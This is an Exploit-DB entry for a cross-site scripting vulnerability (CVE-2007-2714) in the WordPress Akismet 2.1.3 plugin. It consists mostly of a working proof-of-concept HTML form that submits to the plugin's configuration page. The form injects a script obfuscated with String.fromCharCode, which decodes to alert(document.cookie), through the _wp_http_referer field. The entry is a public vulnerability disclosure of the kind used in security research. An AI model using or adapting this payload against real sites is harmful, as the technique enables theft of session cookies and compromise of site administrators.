WordPress Plugin Akismet 2.1.3 - Cross-Site Scripting

EDB-ID:

30036

CVE:

2007-2714

EDB Verified:

Author:

David Kierznowski

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2007-05-14

Vulnerable App:

<!--source: https://www.securityfocus.com/bid/23965/info

The WordPress Akismet plugin is prone to an unspecified vulnerability.
-->

<html> <body> <form action="http://www.example.com/wp-admin/plugins.php?page=akismet-key-config" method="post" id="akismet-conf"> <input name="_wpnonce" value="'" type="text"> <input name="_wp_http_referer" value="'%2522><script>eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105 ,101,41))</script>" type="text"> <input id="key" name="key" size="15" maxlength="12" value="1337"> <input name="submit" value="Update options »" type="submit"> </form> </body> </html>

Tags: WordPress Plugin

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services